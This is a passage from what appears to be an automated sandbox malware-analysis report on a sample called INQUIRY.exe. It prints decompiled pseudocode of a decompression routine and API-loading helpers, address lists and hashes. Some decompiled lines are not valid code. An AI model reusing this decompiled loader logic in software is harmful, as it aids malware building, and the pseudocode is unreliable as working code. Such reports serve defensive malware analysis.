                          							__eax =  *(__ebp - 0x50);
                          							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                          							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                          							__eax =  *(__ebp - 0x58);
                          							__esi = __edx + __eax;
                          							 *(__ebp - 0x54) = __esi;
                          							__ax =  *__esi;
                          							__edi = __ax & 0x0000ffff;
                          							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                          							__eflags =  *(__ebp - 0xc) - __ecx;
                          							if( *(__ebp - 0xc) >= __ecx) {
                          								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                          								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                          								__cx = __ax;
                          								__cx = __ax >> 5;
                          								__eax = __eax - __ecx;
                          								__edx = __edx + 1;
                          								__eflags = __edx;
                          								 *__esi = __ax;
                          								 *(__ebp - 0x50) = __edx;
                          							} else {
                          								 *(__ebp - 0x10) = __ecx;
                          								0x800 = 0x800 - __edi;
                          								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                          								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                          								 *__esi = __cx;
                          							}
                          							__eflags =  *(__ebp - 0x10) - 0x1000000;
                          							if( *(__ebp - 0x10) >= 0x1000000) {
                          								goto L148;
                          							} else {
                          								goto L146;
                          							}
                          						case 0x19:
                          							__eflags = __ebx - 4;
                          							if(__ebx < 4) {
                          								 *(__ebp - 0x2c) = __ebx;
                          								L119:
                          								_t393 = __ebp - 0x2c;
                          								 *_t393 =  *(__ebp - 0x2c) + 1;
                          								__eflags =  *_t393;
                          								L120:
                          								__eax =  *(__ebp - 0x2c);
                          								__eflags = __eax;
                          								if(__eax == 0) {
                          									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                          									goto L170;
                          								}
                          								__eflags = __eax -  *(__ebp - 0x60);
                          								if(__eax >  *(__ebp - 0x60)) {
                          									goto L171;
                          								}
                          								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                          								__eax =  *(__ebp - 0x30);
                          								_t400 = __ebp - 0x60;
                          								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                          								__eflags =  *_t400;
                          								goto L123;
                          							}
                          							__ecx = __ebx;
                          							__eax = __ebx;
                          							__ecx = __ebx >> 1;
                          							__eax = __ebx & 0x00000001;
                          							__ecx = (__ebx >> 1) - 1;
                          							__al = __al | 0x00000002;
                          							__eax = (__ebx & 0x00000001) << __cl;
                          							__eflags = __ebx - 0xe;
                          							 *(__ebp - 0x2c) = __eax;
                          							if(__ebx >= 0xe) {
                          								__ebx = 0;
                          								 *(__ebp - 0x48) = __ecx;
                          								L102:
                          								__eflags =  *(__ebp - 0x48);
                          								if( *(__ebp - 0x48) <= 0) {
                          									__eax = __eax + __ebx;
                          									 *(__ebp - 0x40) = 4;
                          									 *(__ebp - 0x2c) = __eax;
                          									__eax =  *(__ebp - 4);
                          									__eax =  *(__ebp - 4) + 0x644;
                          									__eflags = __eax;
                          									L108:
                          									__ebx = 0;
                          									 *(__ebp - 0x58) = __eax;
                          									 *(__ebp - 0x50) = 1;
                          									 *(__ebp - 0x44) = 0;
                          									 *(__ebp - 0x48) = 0;
                          									L112:
                          									__eax =  *(__ebp - 0x40);
                          									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                          									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                          										_t391 = __ebp - 0x2c;
                          										 *_t391 =  *(__ebp - 0x2c) + __ebx;
                          										__eflags =  *_t391;
                          										goto L119;
                          									}
                          									__eax =  *(__ebp - 0x50);
                          									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                          									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                          									__eax =  *(__ebp - 0x58);
                          									__esi = __edi + __eax;
                          									 *(__ebp - 0x54) = __esi;
                          									__ax =  *__esi;
                          									__ecx = __ax & 0x0000ffff;
                          									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                          									__eflags =  *(__ebp - 0xc) - __edx;
                          									if( *(__ebp - 0xc) >= __edx) {
                          										__ecx = 0;
                          										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                          										__ecx = 1;
                          										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                          										__ebx = 1;
                          										__ecx =  *(__ebp - 0x48);
                          										__ebx = 1 << __cl;
                          										__ecx = 1 << __cl;
                          										__ebx =  *(__ebp - 0x44);
                          										__ebx =  *(__ebp - 0x44) | __ecx;
                          										__cx = __ax;
                          										__cx = __ax >> 5;
                          										__eax = __eax - __ecx;
                          										__edi = __edi + 1;
                          										__eflags = __edi;
                          										 *(__ebp - 0x44) = __ebx;
                          										 *__esi = __ax;
                          										 *(__ebp - 0x50) = __edi;
                          									} else {
                          										 *(__ebp - 0x10) = __edx;
                          										0x800 = 0x800 - __ecx;
                          										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                          										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                          										 *__esi = __dx;
                          									}
                          									__eflags =  *(__ebp - 0x10) - 0x1000000;
                          									if( *(__ebp - 0x10) >= 0x1000000) {
                          										L111:
                          										_t368 = __ebp - 0x48;
                          										 *_t368 =  *(__ebp - 0x48) + 1;
                          										__eflags =  *_t368;
                          										goto L112;
                          									} else {
                          										goto L109;
                          									}
                          								}
                          								__ecx =  *(__ebp - 0xc);
                          								__ebx = __ebx + __ebx;
                          								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                          								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                          								 *(__ebp - 0x44) = __ebx;
                          								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                          									__ecx =  *(__ebp - 0x10);
                          									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                          									__ebx = __ebx | 0x00000001;
                          									__eflags = __ebx;
                          									 *(__ebp - 0x44) = __ebx;
                          								}
                          								__eflags =  *(__ebp - 0x10) - 0x1000000;
                          								if( *(__ebp - 0x10) >= 0x1000000) {
                          									L101:
                          									_t338 = __ebp - 0x48;
                          									 *_t338 =  *(__ebp - 0x48) - 1;
                          									__eflags =  *_t338;
                          									goto L102;
                          								} else {
                          									goto L99;
                          								}
                          							}
                          							__edx =  *(__ebp - 4);
                          							__eax = __eax - __ebx;
                          							 *(__ebp - 0x40) = __ecx;
                          							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                          							goto L108;
                          						case 0x1a:
                          							goto L55;
                          						case 0x1b:
                          							L75:
                          							__eflags =  *(__ebp - 0x64);
                          							if( *(__ebp - 0x64) == 0) {
                          								 *(__ebp - 0x88) = 0x1b;
                          								goto L170;
                          							}
                          							__eax =  *(__ebp - 0x14);
                          							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                          							__eflags = __eax -  *(__ebp - 0x74);
                          							if(__eax >=  *(__ebp - 0x74)) {
                          								__eax = __eax +  *(__ebp - 0x74);
                          								__eflags = __eax;
                          							}
                          							__edx =  *(__ebp - 8);
                          							__cl =  *(__eax + __edx);
                          							__eax =  *(__ebp - 0x14);
                          							 *(__ebp - 0x5c) = __cl;
                          							 *(__eax + __edx) = __cl;
                          							__eax = __eax + 1;
                          							__edx = 0;
                          							_t274 = __eax %  *(__ebp - 0x74);
                          							__eax = __eax /  *(__ebp - 0x74);
                          							__edx = _t274;
                          							__eax =  *(__ebp - 0x68);
                          							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                          							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                          							_t283 = __ebp - 0x64;
                          							 *_t283 =  *(__ebp - 0x64) - 1;
                          							__eflags =  *_t283;
                          							 *( *(__ebp - 0x68)) = __cl;
                          							goto L79;
                          						case 0x1c:
                          							while(1) {
                          								L123:
                          								__eflags =  *(__ebp - 0x64);
                          								if( *(__ebp - 0x64) == 0) {
                          									break;
                          								}
                          								__eax =  *(__ebp - 0x14);
                          								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                          								__eflags = __eax -  *(__ebp - 0x74);
                          								if(__eax >=  *(__ebp - 0x74)) {
                          									__eax = __eax +  *(__ebp - 0x74);
                          									__eflags = __eax;
                          								}
                          								__edx =  *(__ebp - 8);
                          								__cl =  *(__eax + __edx);
                          								__eax =  *(__ebp - 0x14);
                          								 *(__ebp - 0x5c) = __cl;
                          								 *(__eax + __edx) = __cl;
                          								__eax = __eax + 1;
                          								__edx = 0;
                          								_t414 = __eax %  *(__ebp - 0x74);
                          								__eax = __eax /  *(__ebp - 0x74);
                          								__edx = _t414;
                          								__eax =  *(__ebp - 0x68);
                          								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                          								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                          								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                          								__eflags =  *(__ebp - 0x30);
                          								 *( *(__ebp - 0x68)) = __cl;
                          								 *(__ebp - 0x14) = __edx;
                          								if( *(__ebp - 0x30) > 0) {
                          									continue;
                          								} else {
                          									goto L80;
                          								}
                          							}
                          							 *(__ebp - 0x88) = 0x1c;
                          							goto L170;
                          					}
                          				}
                          			}













                          0x00000000
                          0x0040604c
                          0x0040604c
                          0x00406051
                          0x004060c8
                          0x004060cf
                          0x004060d9
                          0x004066b8
                          0x004066b8
                          0x004066bb
                          0x004066bb
                          0x004066c1
                          0x004066c7
                          0x004066cd
                          0x004066e7
                          0x004066ea
                          0x004066f0
                          0x004066fb
                          0x004066fd
                          0x004066cf
                          0x004066cf
                          0x004066de
                          0x004066e2
                          0x004066e2
                          0x00406707
                          0x0040672e
                          0x0040672e
                          0x00406734
                          0x00406734
                          0x00000000
                          0x00406709
                          0x00406709
                          0x0040670d
                          0x004068bc
                          0x00000000
                          0x004068bc
                          0x00406719
                          0x00406720
                          0x00406728
                          0x0040672b
                          0x00000000
                          0x0040672b
                          0x00406053
                          0x00406053
                          0x00406057
                          0x0040605f
                          0x00406062
                          0x00406064
                          0x00406067
                          0x00406069
                          0x0040606e
                          0x00406071
                          0x00406078
                          0x0040607f
                          0x00406082
                          0x0040608d
                          0x00406095
                          0x00406095
                          0x0040608f
                          0x0040608f
                          0x0040608f
                          0x00406084
                          0x00406084
                          0x00406084
                          0x0040609c
                          0x004060ba
                          0x004060bc
                          0x0040628f
                          0x0040628f
                          0x00406292
                          0x00406295
                          0x00406298
                          0x0040629b
                          0x0040629e
                          0x004062a1
                          0x004062a4
                          0x004062a7
                          0x004062ad
                          0x004062c5
                          0x004062c8
                          0x004062cb
                          0x004062ce
                          0x004062ce
                          0x004062d1
                          0x004062d7
                          0x004062af
                          0x004062af
                          0x004062b7
                          0x004062bc
                          0x004062be
                          0x004062c0
                          0x004062c0
                          0x004062e1
                          0x004062e4
                          0x00406287
                          0x0040628d
                          0x00000000
                          0x00000000
                          0x00000000
                          0x004062e6
                          0x00406262
                          0x00406266
                          0x0040686e
                          0x00000000
                          0x0040686e
                          0x0040626c
                          0x0040626f
                          0x00406272
                          0x00406276
                          0x00406279
                          0x0040627f
                          0x00406281
                          0x00406281
                          0x00406284
                          0x00000000
                          0x00406284
                          0x0040609e
                          0x0040609e
                          0x004060a1
                          0x004060a7
                          0x004060a9
                          0x004060a9
                          0x004060ac
                          0x004060af
                          0x004060b1
                          0x004060b2
                          0x004060b5
                          0x00406122
                          0x00406122
                          0x00406126
                          0x00406129
                          0x0040612c
                          0x0040612f
                          0x00406132
                          0x00406133
                          0x00406136
                          0x00406138
                          0x0040613e
                          0x00406141
                          0x00406144
                          0x00406147
                          0x0040614a
                          0x00406150
                          0x0040616c
                          0x0040616f
                          0x00406172
                          0x00406175
                          0x0040617c
                          0x00406182
                          0x00406186
                          0x00406152
                          0x00406152
                          0x00406156
                          0x0040615e
                          0x00406163
                          0x00406165
                          0x00406167
                          0x00406167
                          0x00406190
                          0x00406193
                          0x0040610a
                          0x0040610a
                          0x00406110
                          0x004061c3
                          0x004061c9
                          0x00000000
                          0x00000000
                          0x004061cb
                          0x004061ce
                          0x004061d1
                          0x004061d4
                          0x004061d7
                          0x004061da
                          0x004061dd
                          0x004061e0
                          0x004061e3
                          0x004061e9
                          0x00406201
                          0x00406204
                          0x00406207
                          0x0040620a
                          0x0040620a
                          0x0040620d
                          0x00406213
                          0x004061eb
                          0x004061eb
                          0x004061f3
                          0x004061f8
                          0x004061fa
                          0x004061fc
                          0x004061fc
                          0x0040621d
                          0x00406220
                          0x0040619e
                          0x004061a2
                          0x00406862
                          0x00000000
                          0x00406862
                          0x004061a8
                          0x004061ab
                          0x004061ae
                          0x004061b2
                          0x004061b5
                          0x004061bb
                          0x004061bd
                          0x004061bd
                          0x004061c0
                          0x004061c0
                          0x00406220
                          0x00406227
                          0x00406227
                          0x00406227
                          0x0040622b
                          0x0040622b
                          0x0040622e
                          0x00406231
                          0x00406235
                          0x0040687a
                          0x00000000
                          0x0040687a
                          0x0040623b
                          0x0040623e
                          0x00406241
                          0x00406244
                          0x00406247
                          0x0040624a
                          0x0040624d
                          0x0040624f
                          0x00406252
                          0x00406255
                          0x00406258
                          0x0040625a
                          0x0040625a
                          0x0040625a
                          0x004063f7
                          0x004063f7
                          0x004063fa
                          0x004063fa
                          0x00000000
                          0x004063fa
                          0x0040611c
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00406199
                          0x004060e5
                          0x004060e9
                          0x00406856
                          0x004068d2
                          0x004068da
                          0x004068e1
                          0x004068e3
                          0x004068ea
                          0x004068ee
                          0x004068ee
                          0x004060ef
                          0x004060f2
                          0x004060f5
                          0x004060f9
                          0x004060fc
                          0x00406102
                          0x00406104
                          0x00406104
                          0x00406107
                          0x00000000
                          0x00406107
                          0x00406193
                          0x0040609c
                          0x00405ed0
                          0x00405ed0
                          0x00405ed9
                          0x004068e7
                          0x004068e7
                          0x00000000
                          0x004068e7
                          0x00405edf
                          0x00000000
                          0x00405eea
                          0x00000000
                          0x00000000
                          0x00405ef3
                          0x00405ef6
                          0x00405ef9
                          0x00405efd
                          0x00000000
                          0x00000000
                          0x00405f03
                          0x00405f06
                          0x00405f08
                          0x00405f09
                          0x00405f0c
                          0x00405f0e
                          0x00405f0f
                          0x00405f11
                          0x00405f14
                          0x00405f19
                          0x00405f1e
                          0x00405f27
                          0x00405f3a
                          0x00405f3d
                          0x00405f49
                          0x00405f71
                          0x00405f73
                          0x00405f81
                          0x00405f81
                          0x00405f85
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00405f75
                          0x00405f75
                          0x00405f78
                          0x00405f79
                          0x00405f79
                          0x00000000
                          0x00405f75
                          0x00405f4f
                          0x00405f54
                          0x00405f54
                          0x00405f5d
                          0x00405f65
                          0x00405f68
                          0x00000000
                          0x00405f6e
                          0x00405f6e
                          0x00000000
                          0x00405f6e
                          0x00000000
                          0x00405f8b
                          0x00405f8b
                          0x00405f8f
                          0x0040683b
                          0x00000000
                          0x0040683b
                          0x00405f98
                          0x00405fa8
                          0x00405fab
                          0x00405fae
                          0x00405fae
                          0x00405fae
                          0x00405fb1
                          0x00405fb5
                          0x00000000
                          0x00000000
                          0x00405fb7
                          0x00405fbd
                          0x00405fe7
                          0x00405fed
                          0x00405ff4
                          0x00000000
                          0x00405ff4
                          0x00405fc3
                          0x00405fc6
                          0x00405fcb
                          0x00405fcb
                          0x00405fd6
                          0x00405fde
                          0x00405fe1
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00406026
                          0x0040602c
                          0x0040602f
                          0x0040603c
                          0x00406044
                          0x00000000
                          0x00000000
                          0x00405ffb
                          0x00405ffb
                          0x00405fff
                          0x0040684a
                          0x00000000
                          0x0040684a
                          0x0040600b
                          0x00406016
                          0x00406016
                          0x00406016
                          0x00406019
                          0x0040601c
                          0x0040601f
                          0x00406024
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x004062eb
                          0x004062ef
                          0x0040630d
                          0x00406310
                          0x00406317
                          0x0040631a
                          0x0040631d
                          0x00406320
                          0x00406323
                          0x00406326
                          0x00406328
                          0x0040632f
                          0x00406330
                          0x00406332
                          0x00406335
                          0x00406338
                          0x0040633b
                          0x0040633b
                          0x00406340
                          0x00000000
                          0x00406340
                          0x004062f1
                          0x004062f4
                          0x004062f7
                          0x00406301
                          0x00000000
                          0x00000000
                          0x00406355
                          0x00406359
                          0x0040637c
                          0x0040637f
                          0x00406382
                          0x0040638c
                          0x0040635b
                          0x0040635b
                          0x0040635e
                          0x00406361
                          0x00406364
                          0x00406371
                          0x00406374
                          0x00406374
                          0x00000000
                          0x00000000
                          0x00406398
                          0x0040639c
                          0x00000000
                          0x00000000
                          0x004063a2
                          0x004063a6
                          0x00000000
                          0x00000000
                          0x004063ac
                          0x004063ae
                          0x004063b2
                          0x004063b2
                          0x004063b5
                          0x004063b9
                          0x00000000
                          0x00000000
                          0x00406409
                          0x0040640d
                          0x00406414
                          0x00406417
                          0x0040641a
                          0x00406424
                          0x00000000
                          0x00406424
                          0x0040640f
                          0x00000000
                          0x00000000
                          0x00406430
                          0x00406434
                          0x0040643b
                          0x0040643e
                          0x00406441
                          0x00406436
                          0x00406436
                          0x00406436
                          0x00406444
                          0x00406447
                          0x0040644a
                          0x0040644a
                          0x0040644d
                          0x00406450
                          0x00406453
                          0x00406453
                          0x00406456
                          0x0040645d
                          0x00406462
                          0x00000000
                          0x00000000
                          0x004064f0
                          0x004064f0
                          0x004064f4
                          0x00406892
                          0x00000000
                          0x00406892
                          0x004064fa
                          0x004064fd
                          0x00406500
                          0x00406504
                          0x00406507
                          0x0040650d
                          0x0040650f
                          0x0040650f
                          0x0040650f
                          0x00406512
                          0x00406515
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00406573
                          0x00406573
                          0x00406577
                          0x0040689e
                          0x00000000
                          0x0040689e
                          0x0040657d
                          0x00406580
                          0x00406583
                          0x00406587
                          0x0040658a
                          0x00406590
                          0x00406592
                          0x00406592
                          0x00406592
                          0x00406595
                          0x00000000
                          0x00000000
                          0x00406343
                          0x00406343
                          0x00406346
                          0x00000000
                          0x00000000
                          0x00406682
                          0x00406686
                          0x004066a8
                          0x004066ab
                          0x004066b5
                          0x00000000
                          0x004066b5
                          0x00406688
                          0x0040668b
                          0x0040668f
                          0x00406692
                          0x00406692
                          0x00406695
                          0x00000000
                          0x00000000
                          0x0040673f
                          0x00406743
                          0x00406761
                          0x00406761
                          0x00406761
                          0x00406768
                          0x0040676f
                          0x00406776
                          0x00406776
                          0x00000000
                          0x00406776
                          0x00406745
                          0x00406748
                          0x0040674b
                          0x0040674e
                          0x00406755
                          0x00406699
                          0x00406699
                          0x0040669c
                          0x00000000
                          0x00000000
                          0x00406830
                          0x00406833
                          0x00000000
                          0x00000000
                          0x0040646a
                          0x0040646c
                          0x00406473
                          0x00406474
                          0x00406476
                          0x00406479
                          0x00000000
                          0x00000000
                          0x00406481
                          0x00406484
                          0x00406487
                          0x00406489
                          0x0040648b
                          0x0040648b
                          0x0040648c
                          0x0040648f
                          0x00406496
                          0x00406499
                          0x004064a7
                          0x00000000
                          0x00000000
                          0x0040677d
                          0x0040677d
                          0x00406780
                          0x00406787
                          0x00000000
                          0x00000000
                          0x0040678c
                          0x0040678c
                          0x00406790
                          0x004068c8
                          0x00000000
                          0x004068c8
                          0x00406796
                          0x00406799
                          0x0040679c
                          0x004067a0
                          0x004067a3
                          0x004067a9
                          0x004067ab
                          0x004067ab
                          0x004067ab
                          0x004067ae
                          0x004067b1
                          0x004067b1
                          0x004067b1
                          0x004067b1
                          0x004067b4
                          0x004067b4
                          0x004067b8
                          0x00406818
                          0x0040681b
                          0x00406820
                          0x00406821
                          0x00406823
                          0x00406825
                          0x00406828
                          0x00000000
                          0x00406828
                          0x004067ba
                          0x004067c0
                          0x004067c3
                          0x004067c6
                          0x004067c9
                          0x004067cc
                          0x004067cf
                          0x004067d2
                          0x004067d5
                          0x004067d8
                          0x004067db
                          0x004067f4
                          0x004067f7
                          0x004067fa
                          0x004067fd
                          0x00406801
                          0x00406803
                          0x00406803
                          0x00406804
                          0x00406807
                          0x004067dd
                          0x004067dd
                          0x004067e5
                          0x004067ea
                          0x004067ec
                          0x004067ef
                          0x004067ef
                          0x0040680a
                          0x00406811
                          0x00000000
                          0x00406813
                          0x00000000
                          0x00406813
                          0x00000000
                          0x004064af
                          0x004064b2
                          0x004064e8
                          0x00406618
                          0x00406618
                          0x00406618
                          0x00406618
                          0x0040661b
                          0x0040661b
                          0x0040661e
                          0x00406620
                          0x004068aa
                          0x00000000
                          0x004068aa
                          0x00406626
                          0x00406629
                          0x00000000
                          0x00000000
                          0x0040662f
                          0x00406633
                          0x00406636
                          0x00406636
                          0x00406636
                          0x00000000
                          0x00406636
                          0x004064b4
                          0x004064b6
                          0x004064b8
                          0x004064ba
                          0x004064bd
                          0x004064be
                          0x004064c0
                          0x004064c2
                          0x004064c5
                          0x004064c8
                          0x004064de
                          0x004064e3
                          0x0040651b
                          0x0040651b
                          0x0040651f
                          0x0040654b
                          0x0040654d
                          0x00406554
                          0x00406557
                          0x0040655a
                          0x0040655a
                          0x0040655f
                          0x0040655f
                          0x00406561
                          0x00406564
                          0x0040656b
                          0x0040656e
                          0x0040659b
                          0x0040659b
                          0x0040659e
                          0x004065a1
                          0x00406615
                          0x00406615
                          0x00406615
                          0x00000000
                          0x00406615
                          0x004065a3
                          0x004065a9
                          0x004065ac
                          0x004065af
                          0x004065b2
                          0x004065b5
                          0x004065b8
                          0x004065bb
                          0x004065be
                          0x004065c1
                          0x004065c4
                          0x004065dd
                          0x004065df
                          0x004065e2
                          0x004065e3
                          0x004065e6
                          0x004065e8
                          0x004065eb
                          0x004065ed
                          0x004065ef
                          0x004065f2
                          0x004065f4
                          0x004065f7
                          0x004065fb
                          0x004065fd
                          0x004065fd
                          0x004065fe
                          0x00406601
                          0x00406604
                          0x004065c6
                          0x004065c6
                          0x004065ce
                          0x004065d3
                          0x004065d5
                          0x004065d8
                          0x004065d8
                          0x00406607
                          0x0040660e
                          0x00406598
                          0x00406598
                          0x00406598
                          0x00406598
                          0x00000000
                          0x00406610
                          0x00000000
                          0x00406610
                          0x0040660e
                          0x00406521
                          0x00406524
                          0x00406526
                          0x00406529
                          0x0040652c
                          0x0040652f
                          0x00406531
                          0x00406534
                          0x00406537
                          0x00406537
                          0x0040653a
                          0x0040653a
                          0x0040653d
                          0x00406544
                          0x00406518
                          0x00406518
                          0x00406518
                          0x00406518
                          0x00000000
                          0x00406546
                          0x00000000
                          0x00406546
                          0x00406544
                          0x004064ca
                          0x004064cd
                          0x004064cf
                          0x004064d2
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x004063bc
                          0x004063bc
                          0x004063c0
                          0x00406886
                          0x00000000
                          0x00406886
                          0x004063c6
                          0x004063c9
                          0x004063cc
                          0x004063cf
                          0x004063d1
                          0x004063d1
                          0x004063d1
                          0x004063d4
                          0x004063d7
                          0x004063da
                          0x004063dd
                          0x004063e0
                          0x004063e3
                          0x004063e4
                          0x004063e6
                          0x004063e6
                          0x004063e6
                          0x004063e9
                          0x004063ec
                          0x004063ef
                          0x004063f2
                          0x004063f2
                          0x004063f2
                          0x004063f5
                          0x00000000
                          0x00000000
                          0x00406639
                          0x00406639
                          0x00406639
                          0x0040663d
                          0x00000000
                          0x00000000
                          0x00406643
                          0x00406646
                          0x00406649
                          0x0040664c
                          0x0040664e
                          0x0040664e
                          0x0040664e
                          0x00406651
                          0x00406654
                          0x00406657
                          0x0040665a
                          0x0040665d
                          0x00406660
                          0x00406661
                          0x00406663
                          0x00406663
                          0x00406663
                          0x00406666
                          0x00406669
                          0x0040666c
                          0x0040666f
                          0x00406672
                          0x00406676
                          0x00406678
                          0x0040667b
                          0x00000000
                          0x0040667d
                          0x00000000
                          0x0040667d
                          0x0040667b
                          0x004068b0
                          0x00000000
                          0x00000000
                          0x00405edf

                          Memory Dump Source
                          • Source File: 00000001.00000002.664521633.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000001.00000002.664492604.0000000000400000.00000002.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664553767.0000000000407000.00000002.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664560673.0000000000409000.00000004.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664622300.0000000000422000.00000004.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664638912.0000000000429000.00000004.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664643458.000000000042C000.00000002.00020000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_400000_INQUIRY.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: b8718c5171febd1f94c1c08a97aa2274874a9074e7d0b720a207e81be49f5868
                          • Instruction ID: f98c46a7d4a45b1e93054ee16d037c4b99b117d06cd84a33c86e8ff0b6c30e47
                          • Opcode Fuzzy Hash: b8718c5171febd1f94c1c08a97aa2274874a9074e7d0b720a207e81be49f5868
                          • Instruction Fuzzy Hash: 83F18771D00229CBDF18DFA8C8946ADBBB1FF44305F25816ED856BB281D3785A86CF44
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E00405D7C(CHAR* _a4) {
                          				void* _t2;
                          
                          				_t2 = FindFirstFileA(_a4, 0x4224e8); // executed
                          				if(_t2 == 0xffffffff) {
                          					return 0;
                          				}
                          				FindClose(_t2);
                          				return 0x4224e8;
                          			}




                          0x00405d87
                          0x00405d90
                          0x00000000
                          0x00405d9d
                          0x00405d93
                          0x00000000

                          APIs
                          • FindFirstFileA.KERNELBASE(?,004224E8,004218A0,0040569C,004218A0,004218A0,00000000,004218A0,004218A0,?,?,73BCF560,004053BE,?,"C:\Users\user\Desktop\INQUIRY.exe" ,73BCF560), ref: 00405D87
                          • FindClose.KERNEL32(00000000), ref: 00405D93
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.664521633.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000001.00000002.664492604.0000000000400000.00000002.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664553767.0000000000407000.00000002.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664560673.0000000000409000.00000004.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664622300.0000000000422000.00000004.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664638912.0000000000429000.00000004.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664643458.000000000042C000.00000002.00020000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_400000_INQUIRY.jbxd
                          Similarity
                          • API ID: Find$CloseFileFirst
                          • String ID: $B
                          • API String ID: 2295610775-2366330246
                          • Opcode ID: faf9a5a1b02af36eb702065ba3c0ed1dca863e262e1f5f2ed0a66c6ec2a69bc9
                          • Instruction ID: 8877f450b99b184e504413f9ffa66f4d164bf9bd4a7d07bd52ad5b53af664480
                          • Opcode Fuzzy Hash: faf9a5a1b02af36eb702065ba3c0ed1dca863e262e1f5f2ed0a66c6ec2a69bc9
                          • Instruction Fuzzy Hash: 84D012319595306BC75127386D0C84B7A59DF15331750CA33F02AF22F0D3748C518AAD
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E00405DA3(signed int _a4) {
                          				struct HINSTANCE__* _t5;
                          				CHAR* _t7;
                          				signed int _t9;
                          
                          				_t9 = _a4 << 3;
                          				_t7 =  *(_t9 + 0x409218);
                          				_t5 = GetModuleHandleA(_t7);
                          				if(_t5 != 0) {
                          					L2:
                          					return GetProcAddress(_t5,  *(_t9 + 0x40921c));
                          				}
                          				_t5 = LoadLibraryA(_t7); // executed
                          				if(_t5 != 0) {
                          					goto L2;
                          				}
                          				return _t5;
                          			}






                          0x00405dab
                          0x00405dae
                          0x00405db5
                          0x00405dbd
                          0x00405dca
                          0x00000000
                          0x00405dd1
                          0x00405dc0
                          0x00405dc8
                          0x00000000
                          0x00000000
                          0x00405dd9

                          APIs
                          • GetModuleHandleA.KERNEL32(?,?,00000000,00403268,00000008), ref: 00405DB5
                          • LoadLibraryA.KERNELBASE(?,?,00000000,00403268,00000008), ref: 00405DC0
                          • GetProcAddress.KERNEL32(00000000,?), ref: 00405DD1
                          Memory Dump Source
                          • Source File: 00000001.00000002.664521633.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000001.00000002.664492604.0000000000400000.00000002.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664553767.0000000000407000.00000002.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664560673.0000000000409000.00000004.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664622300.0000000000422000.00000004.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664638912.0000000000429000.00000004.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664643458.000000000042C000.00000002.00020000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_400000_INQUIRY.jbxd
                          Similarity
                          • API ID: AddressHandleLibraryLoadModuleProc
                          • String ID:
                          • API String ID: 310444273-0
                          • Opcode ID: dcb02677a219034efdab4e35853fb1e5d97da29e7b116a2417b6d6f34bb30324
                          • Instruction ID: 37252885b6730f192407f0687863edf929784b14cf5d3781349e011cb12c2895
